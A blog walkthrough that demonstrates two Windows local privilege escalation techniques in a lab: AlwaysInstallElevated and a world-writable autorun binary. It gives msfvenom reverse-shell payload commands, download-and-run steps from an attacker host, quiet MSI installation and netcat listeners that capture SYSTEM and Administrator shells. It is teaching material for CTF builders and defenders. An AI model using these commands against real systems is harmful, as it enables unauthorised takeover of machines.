Windows Local Privilege Escalation - Registry Hives for CTF Creators

pwnlog included in Windows Local Privilege Escalation

2022-03-20 2667 words 13 minutes

Contents

Registry Hives

Registry hives are essential components of the Windows operating system’s registry. They are logical groups of keys, subkeys, and values that store configuration settings and options for the operating system and installed applications. Each hive is associated with a set of supporting files that are loaded into memory when the system starts or a user logs in.

Here are the main registry hives:

HKEY_CLASSES_ROOT (HKCR): Contains information about registered applications, including file associations and OLE object class IDs.
HKEY_CURRENT_USER (HKCU): Stores settings and preferences for the currently logged-in user.
HKEY_LOCAL_MACHINE (HKLM): Contains configuration settings for the local computer, including hardware and software settings.
HKEY_USERS (HKU): Holds user-specific settings for all users on the system.
HKEY_CURRENT_CONFIG (HKCC): Contains information about the current hardware profile used by the system.

Each hive has its own set of supporting files, typically located in the %SystemRoot%\System32\Config directory. These files are updated whenever changes are made to the registry.

Privilege Escalation via AlwaysInstallElevated

The MSI Wrapper is for software developers who have a setup executable file and want to offer an MSI that wraps their original setup executable file. It is also useful for system administrators with a setup.exe they want to distribute as an MSI to client computers in their organization.

Once you have downloaded the MSI Wrapper:

/images/posts/msi-wrapper-downloaded.png — MSI Wrapper

Execute the setup wizard and click Next:

/images/posts/msi-wrapper-1.png — MSI Wrapper

Accept the License Agreement and click Next:

/images/posts/msi-wrapper-2.png — MSI Wrapper

We can change the destination folder if we want, I will leave it as it is:

/images/posts/msi-wrapper-3.png — MSI Wrapper

Then click Install:

/images/posts/msi-wrapper-4.png — MSI Wrapper

Once it is completed, click on Finish:

/images/posts/msi-wrapper-5.png — MSI Wrapper

Optionally, we could create a desktop shortcut or pin to the taskbar:

/images/posts/msi-wrapper-6.png — MSI Wrapper

Generate an executable reverse shell:

1
2
3
4
5
6
7
❯ msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.119.130 LPORT=443 -f exe -o implant.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes
Saved as: implant.exe

Setup an HTTP listener:

1
2
3
4
❯ sudo python3 -m http.server 80
[sudo] password for kali:
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.119.129 - - [06/Mar/2022 17:54:06] "GET /implant.exe HTTP/1.1" 200 -

Download the file with powershell:

1
PS C:\Tools> wget 192.168.119.130/implant.exe -O implant.exe

This will be the MSI wrapper configuration file msi_template.xml:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
<MsiWrapper>
  <Installer>
    <IconFile Detect="executable" Value="" />
    <Output FileName="C:\Tools\implant.msi" />
    <InstallPrivileges Value="Elevated" />
    <PerUser Value="yes" />
    <ElevateExecutable Value="always" />
    <UpgradeCode Value="{55F46570-1C98-4098-9191-18B383E567D3}" />
    <ProductId Value="" />
    <Registration Value="None" />
    <Manufacturer Detect="" Value="Holo Industries" />
    <ProductVersion Detect="executable" Value="0.0.0.0" />
    <ProductName Detect="" Value="Holo" />
    <Comments Detect="executable" Value="" />
    <Contact Detect="" Value="" />
    <HelpLink Detect="" Value="" />
    <UpdateLink Detect="" Value="" />
    <AboutLink Detect="" Value="" />
  </Installer>
  <WrappedInstaller>
    <Executable FileName="C:\Tools\implant.exe" SuccessCodes="" Impersonate="no" IncludeFiles="no" CompressionLevel="Max" />
    <ApplicationId Value="" />
    <Install>
      <Arguments Value="">
        <UILevelNone Value="" />
        <UILevelBasic Value="" />
        <UILevelReduced Value="" />
        <UILevelFull Value="" />
      </Arguments>
      <RunBeforeInstall Value="" />
      <RunAfterInstall Value="" />
    </Install>
    <Uninstall>
      <Arguments Value="">
        <UILevelNone Value="" />
        <UILevelBasic Value="" />
        <UILevelReduced Value="" />
        <UILevelFull Value="" />
      </Arguments>
    </Uninstall>
  </WrappedInstaller>
</MsiWrapper>

Then we’re gonna execute MSI Wrapper and click on Load Settings:

/images/posts/msi-wrapper-7.png — MSI Wrapper

Open the configuration file:

/images/posts/msi-wrapper-8.png — MSI Wrapper

Once the configuration is loaded, click Ok and then click on Next >:

/images/posts/msi-wrapper-9.png — MSI Wrapper

Verify the executable and the implant MSI package:

/images/posts/msi-wrapper-10.png — MSI Wrapper

This setting is up to you:

/images/posts/msi-wrapper-11.png — MSI Wrapper

Make sure the Security and User Context are correct:

/images/posts/msi-wrapper-12.png — MSI Wrapper

Click next until the build:

/images/posts/msi-wrapper-13.png — MSI Wrapper

After building the MSI package we will receive a message like this:

/images/posts/msi-wrapper-14.png — MSI Wrapper

Now click Exit and navigate to the MSI package:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
PS C:\Users\user> whoami /all

USER INFORMATION
----------------

User Name            SID
==================== =============================================
desktop-bn\user S-1-5-21-264094270-2388996790-3434637240-1001


GROUP INFORMATION
-----------------

Group Name                                                    Type             SID          Attributes
============================================================= ================ ============ ==================================================
Everyone                                                      Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account and member of Administrators group Well-known group S-1-5-114    Group used for deny only
BUILTIN\Administrators                                        Alias            S-1-5-32-544 Group used for deny only
BUILTIN\Performance Log Users                                 Alias            S-1-5-32-559 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                                                 Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE                                      Well-known group S-1-5-4      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                                                 Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users                              Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization                                Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account                                    Well-known group S-1-5-113    Mandatory group, Enabled by default, Enabled group
LOCAL                                                         Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication                              Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level                        Label            S-1-16-8192


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
SeTimeZonePrivilege           Change the time zone                 Disabled        Change the time zone                 Disabled

Install the MSI package quietly:

1
msiexec /quiet /qn /i c:\Tools\implant.msi

After executing the malicious MSI, we receive a reverse shell as NT AUTHORITY SYSTEM:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
❯ nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.119.130] from (UNKNOWN) [192.168.119.129] 58480
Microsoft Windows [Version 10.0.22000.318]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\SysWOW64>whoami /all
whoami /all

USER INFORMATION
----------------

User Name           SID
=================== ========
nt authority\system S-1-5-18


GROUP INFORMATION
-----------------

Group Name                           Type             SID                                                            Attributes       
==================================== ================ ============================================================== ==================================================
Mandatory Label\High Mandatory Level Label            S-1-16-12288                                                                    
Everyone                             Well-known group S-1-1-0                                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                        Alias            S-1-5-32-545                                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE                 Well-known group S-1-5-6                                                        Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                        Well-known group S-1-2-1                                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users     Well-known group S-1-5-11                                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization       Well-known group S-1-5-15                                                       Mandatory group, Enabled by default, Enabled group
NT SERVICE\msiserver                 Well-known group S-1-5-80-685333868-2237257676-1431965530-1907094206-2438021966 Enabled by default, Enabled group, Group owner
LOCAL                                Well-known group S-1-2-0                                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators               Alias            S-1-5-32-544                                                   Enabled by default, Enabled group, Group owner


PRIVILEGES INFORMATION
----------------------

Privilege Name                  Description                               State
=============================== ========================================= ========
SeAssignPrimaryTokenPrivilege   Replace a process level token             Disabled
SeLockMemoryPrivilege           Lock pages in memory                      Enabled
SeIncreaseQuotaPrivilege        Adjust memory quotas for a process        Disabled
SeTcbPrivilege                  Act as part of the operating system       Enabled
SeSecurityPrivilege             Manage auditing and security log          Enabled
SeTakeOwnershipPrivilege        Take ownership of files or other objects  Disabled
SeLoadDriverPrivilege           Load and unload device drivers            Disabled
SeProfileSingleProcessPrivilege Profile single process                    Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority              Enabled
SeCreatePagefilePrivilege       Create a pagefile                         Enabled
SeCreatePermanentPrivilege      Create permanent shared objects           Enabled
SeBackupPrivilege               Back up files and directories             Disabled
SeRestorePrivilege              Restore files and directories             Disabled
SeShutdownPrivilege             Shut down the system                      Disabled
SeAuditPrivilege                Generate security audits                  Enabled
SeChangeNotifyPrivilege         Bypass traverse checking                  Enabled
SeImpersonatePrivilege          Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege         Create global objects                     Enabled
SeCreateSymbolicLinkPrivilege   Create symbolic links                     Enabled

ERROR: Unable to get user claims information.

If we execute Process Hacker as Administrator we can see the process tree:

/images/posts/process-hacker-autoelevate.png — Process Hacker AutoElevate

Note: In the case that you don’t see the process tree, double click on the Name column to change the view. You may need to double click (change the view) multiple times.

Alternatively, we can just generate an MSI reverse shell:

1
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.119.130 LPORT=443 -f msi -o implant.msi

Note: This can be easily detected by modern AVs.

Setup an HTTP listener with python:

1
sudo python3 -m http.server

Download the malicious MSI file to the current working directory:

1
wget 192.168.146.128:8000/reverse.msi -o reverse.msi

Attempt to install reverse.msi by executing the following command:

1
 .\reverse.msi

In the UAC, click Yes and wait for the connection:

/images/posts/registry-uac.png — UAC Registry

Receive the connection:

1
sudo nc -lvnp 443

Privilege Escalation via Autorun Registry

Run PowerShell or the command prompt as administrator and then create the directory:

1
2
3
4
5
6
7
8
9
PS C:\Windows\system32> md "C:\Program Files\Autorun Program"


    Directory: C:\Program Files


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----          3/6/2022   8:03 PM                Autorun Program

Add a dummy program:

1
PS C:\Windows\system32> copy C:\Windows\System32\locator.exe "C:\Program Files\Autorun Program\program.exe"

Grant to the Everyone group full permissions:

1
2
3
PS C:\Windows\system32> icacls "C:\Program Files\Autorun Program\program.exe" /grant "Authenticated Users:F"
processed file: C:\Program Files\Autorun Program\program.exe
Successfully processed 1 files; Failed processing 0 files

Add the program to run at startup via registry:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
PS C:\Windows\system32> reg add HKLM\software\microsoft\windows\currentversion\run /v "My Program" /t REG_SZ /d "C:\Program Files\Autorun Program\program.exe" /f
The operation completed successfully.

PS C:\Windows\system32> dir "C:\Program Files\Autorun Program\program.exe"


    Directory: C:\Program Files\Autorun Program


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----          6/5/2021   8:05 AM          28672 program.exe

We can review the permissions:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
PS C:\> icacls "C:\Program Files\Autorun Program\program.exe"
C:\Program Files\Autorun Program\program.exe NT AUTHORITY\Authenticated Users:(F)
                                             Everyone:(F)
                                             NT AUTHORITY\SYSTEM:(I)(F)
                                             BUILTIN\Administrators:(I)(F)
                                             BUILTIN\Users:(I)(RX)
                                             APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
                                             APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)

Successfully processed 1 files; Failed processing 0 files

Alternatively, we can use accesschk from SysInternals:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
PS C:\> C:\Tools\SysinternalsSuite\accesschk64.exe -accepteula -wvu "C:\Program Files\Autorun Program"

Accesschk v6.14 - Reports effective permissions for securable objects
Copyright ⌐ 2006-2021 Mark Russinovich
Sysinternals - www.sysinternals.com

C:\Program Files\Autorun Program\program.exe
  Medium Mandatory Level (Default) [No-Write-Up]
  RW NT AUTHORITY\Authenticated Users
        FILE_ALL_ACCESS
  RW Everyone
        FILE_ALL_ACCESS
  RW NT AUTHORITY\SYSTEM
        FILE_ALL_ACCESS
  RW BUILTIN\Administrators
        FILE_ALL_ACCESS
  RW BUILTIN\Users
        FILE_ALL_ACCESS

From the output above we can see that the “NT AUTHORITY\Authenticated Users” user group has “FILE_ALL_ACCESS” permission on the “program.exe” file.

Open command prompt or PowerShell as administrator and run the Autoruns GUI app:

1
C:\Tools\SysinternalsSuite\Autoruns64.exe

Note: If the Autoruns64.exe GUI doesn’t show the “My Program” autorun registry key, try executing as administrator first.

In Autoruns, click on the ‘Logon’ tab and from the listed results, notice that the “My Program” entry is pointing to “C:\Program Files\Autorun Program\program.exe”:

/images/posts/autoruns-program.exe.png — AutoRuns Program

The command line version of autoruns is autorunsc.exe (can be executed as medium-integrity level / low privileged user):

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
PS C:\Program Files\Autorun Program> C:\Tools\SysinternalsSuite\autorunsc64.exe -accepteula -a l

Sysinternals Autoruns v14.09 - Autostart program viewer
Copyright (C) 2002-2022 Mark Russinovich
Sysinternals - www.sysinternals.com


<...SNIP...>

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
   SecurityHealth
     %windir%\system32\SecurityHealthSystray.exe
     Windows Security notification icon
     Microsoft Corporation
     10.0.22000.65
     c:\windows\system32\securityhealthsystray.exe
     12/2/1926 7:27 PM
   VMware User Process
     "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe" -n vmusr
     VMware Tools Core Service
     VMware, Inc.
     11.3.5.31214
     c:\program files\vmware\vmware tools\vmtoolsd.exe
     8/31/2021 5:27 AM
   My Program
     "C:\Program Files\Autorun Program\program.exe"
     c:\program files\autorun program\program.exe


<...SNIP...>

Since we have write permissions to C:\Program Files\Autorun Program\program.exe we can replace it with a payload or an implant. In this case, I will generate an executable reverse shell:

1
2
3
4
5
6
7
❯ msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.119.130 LPORT=443 -f exe -o implant.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes
Saved as: implant.exe

Then I will setup an HTTP listener on my attacker machine:

1
2
3
❯ sudo python3 -m http.server 80
[sudo] password for kali:
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

Transfer and replace the original executable with PowerShell:

1
PS C:\> wget 192.168.119.130/implant.exe -O "C:\Program Files\Autorun Program\program.exe"

On the attacker machine, we will set up a listener:

1
❯ nc -lvnp 443

Now let’s sign out and sign in as Administrator and wait a bit, once we have waited we should receive a connection as the Administrator user:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
❯ nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.119.130] from (UNKNOWN) [192.168.119.129] 58708
Microsoft Windows [Version 10.0.22000.318]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami /all
whoami /all

USER INFORMATION
----------------

User Name                     SID                                  
============================= ============================================
desktop-bn\administrator S-1-5-21-264094270-2388996790-3434637240-500


GROUP INFORMATION
-----------------

Group Name                                                    Type             SID          Attributes                                
============================================================= ================ ============ ===============================================================
Everyone                                                      Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account and member of Administrators group Well-known group S-1-5-114    Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators                                        Alias            S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Performance Log Users                                 Alias            S-1-5-32-559 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                                                 Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE                                      Well-known group S-1-5-4      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                                                 Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users                              Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization                                Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account                                    Well-known group S-1-5-113    Mandatory group, Enabled by default, Enabled group
LOCAL                                                         Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication                              Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level                          Label            S-1-16-12288                                           


PRIVILEGES INFORMATION
----------------------

Privilege Name                            Description                                                        State
========================================= ================================================================== ========
SeIncreaseQuotaPrivilege                  Adjust memory quotas for a process                                 Disabled
SeSecurityPrivilege                       Manage auditing and security log                                   Disabled
SeTakeOwnershipPrivilege                  Take ownership of files or other objects                           Disabled
SeLoadDriverPrivilege                     Load and unload device drivers                                     Disabled
SeSystemProfilePrivilege                  Profile system performance                                         Disabled
SeSystemtimePrivilege                     Change the system time                                             Disabled
SeProfileSingleProcessPrivilege           Profile single process                                             Disabled
SeIncreaseBasePriorityPrivilege           Increase scheduling priority                                       Disabled
SeCreatePagefilePrivilege                 Create a pagefile                                                  Disabled
SeBackupPrivilege                         Back up files and directories                                      Disabled
SeRestorePrivilege                        Restore files and directories                                      Disabled
SeShutdownPrivilege                       Shut down the system                                               Disabled
SeDebugPrivilege                          Debug programs                                                     Disabled
SeSystemEnvironmentPrivilege              Modify firmware environment values                                 Disabled
SeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled
SeRemoteShutdownPrivilege                 Force shutdown from a remote system                                Disabled
SeUndockPrivilege                         Remove computer from docking station                               Disabled
SeManageVolumePrivilege                   Perform volume maintenance tasks                                   Disabled
SeImpersonatePrivilege                    Impersonate a client after authentication                          Enabled
SeCreateGlobalPrivilege                   Create global objects                                              Enabled
SeIncreaseWorkingSetPrivilege             Increase a process working set                                     Disabled
SeTimeZonePrivilege                       Change the time zone                                               Disabled
SeCreateSymbolicLinkPrivilege             Create symbolic links                                              Disabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Disabled

Note: A firewall or an antivirus/anti-malware might block the connection.

We can use Process Hacker to view the process token:

/images/posts/process-hacker-autoruns.png — Process Hacker AutoRuns

We can also view the connection with TCPView:

/images/posts/tcpview-program.exe.png — TCPView

We could also use the TCPView command line version:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
PS C:\Tools\SysinternalsSuite> .\tcpvcon.exe

Tcpvcon.exe v4.17 - Sysinternals TcpVcon
Copyright (C) 1996-2022 Mark Russinovich & Bryce Cogswell
Sysinternals - www.sysinternals.com

[TCP] svchost.exe
        PID:    2980
        State:  ESTABLISHED
        Local:  desktop-bn.localdomain
        Remote: 40.83.240.146
[TCP] program.exe
        PID:    16460
        State:  ESTABLISHED
        Local:  desktop-bn.localdomain
        Remote: 192.168.119.130
[TCP] [System Process]
        PID:    0
        State:  TIME_WAIT
        Local:  desktop-bn.localdomain
        Remote: 52.143.80.209
[TCP] explorer.exe
        PID:    11356
        State:  ESTABLISHED
        Local:  desktop-bn.localdomain
        Remote: 52.184.206.73
[TCP] svchost.exe
        PID:    3568
        State:  ESTABLISHED
        Local:  desktop-bn.localdomain
        Remote: 52.143.84.45